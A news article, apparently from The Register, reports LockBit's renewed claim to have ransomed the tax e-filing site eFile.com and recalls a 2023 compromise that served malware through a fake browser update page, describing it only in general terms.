Security

Cyber-crime

Deja blues... LockBit boasts once again of ransoming IRS-authorized eFile.com

Add 'ransomware' to the list of certainties in life?


In an intriguing move, notorious ransomware gang LockBit claims once again to have compromised eFile.com, which offers online services for electronically filing tax returns with the US Internal Revenue Service (IRS).

To be clear: eFile.com is not owned nor operated by the IRS, nor is it part of the agency's e-file program, though it is an IRS-authorized e-file provider.

The Register has not verified the crooks' latest claims, and neither the dot-com nor the IRS immediately responded to The Register's inquiries about the alleged breach. We will update this story as we receive additional information.

If the criminals' boasts on its dark-web blog about the extortion do turn out to be true, it puts a lot of people's personal and financial data potentially at risk — so it's a good idea to keep an eye out for any suspicious banking activity. The website is said to have 14 days to cough up the demanded ransom.

That all said, LockBit claimed to have compromised eFile.com in 2022. The gang may well just be re-posting on its blog its previous hit on the dot-com for clout or chaos, or may be trying to extract money from the victim all over again. We're checking that out.

Repeated target

We recall that in March 2023, eFile.com's website was compromised and used it to deliver malware. That intrusion — about a month before America's tax day — was spotted by Reddit users who noted that when visiting eFile.com, they were taken to a phony browser update page with a link to download and run a .exe file.

It turned out the redirection was caused by JavaScript maliciously added to the dot-com site, as confirmed by SANS Internet Storm Center founder Johannes Ullrich, which led to people being tricked into running the downloaded executable and backdooring their Windows PCs. eFile.com later removed the malicious code from its website.

This latest talk of a compromise hits right as late tax filers, who were granted an extension by the IRS in April, scramble to submit their documents prior to the October 15 deadline.

And, of course, these claims come despite LockBit's ransomware operations being largely disrupted by global law enforcement earlier this year. While many of the gang's affiliates have moved on to greener pastures — or at least ones without as big of a targeted painted on them — LockBit ransomware refuses to die.

According to Check Point's most recent monthly ransomware stats, LockBit3 ransomware was responsible for 8 percent of all infections in August, putting this particular strain in the No. 3 position behind RansomHub (15 percent) and Meow (9 percent). ®

Send us news
1 Comment

Another banner year for ransomware gangs despite takedowns by the cops

And it doesn't take a crystal ball to predict the future

Security pros more confident about fending off ransomware, despite being battered by attacks

Data leak, shmata leak. It will all work out, right?

Baguette bandits strike again with ransomware and a side of mockery

Big-game hunting to the extreme

If Ransomware Inc was a company, its 2024 results would be a horror show

35% drop in payments across the year as your backups got better and law enforcement made a difference

What does it mean to build in security from the ground up?

As if secure design is the only bullet point in a list of software engineering best practices

Ransomware scum make it personal for <i>Reg</i> readers by impersonating tech support

That invitation to a Teams call on which IT promises to mop up a spamstorm may not be what it seems

Trump 'waved a white flag to Chinese hackers' as Homeland Security axed cyber advisory boards

And: America 'has never been less secure,' retired rear admiral tells Congress

Apple missed screenshot-snooping malware in code that made it into the App Store, Kaspersky claims

OCR plugin great for extracting crypto-wallet secrets from galleries

Why is my Mitel phone DDoSing strangers? Oh, it was roped into a new Mirai botnet

And now you won't stop calling me, I'm kinda busy

One of Salt Typhoon's favorite flaws still wide open on 91% of at-risk Exchange Servers

But we mean, you've had nearly four years to patch

Someone is slipping a hidden backdoor into Juniper routers across the globe, activated by a magic packet

Who could be so interested in chips, manufacturing, and more, in the US, UK, Europe, Russia...

Infosec was literally the last item in Trump's policy plan, yet major changes are likely on his watch

Everyone agrees defense matters. How to do it is up for debate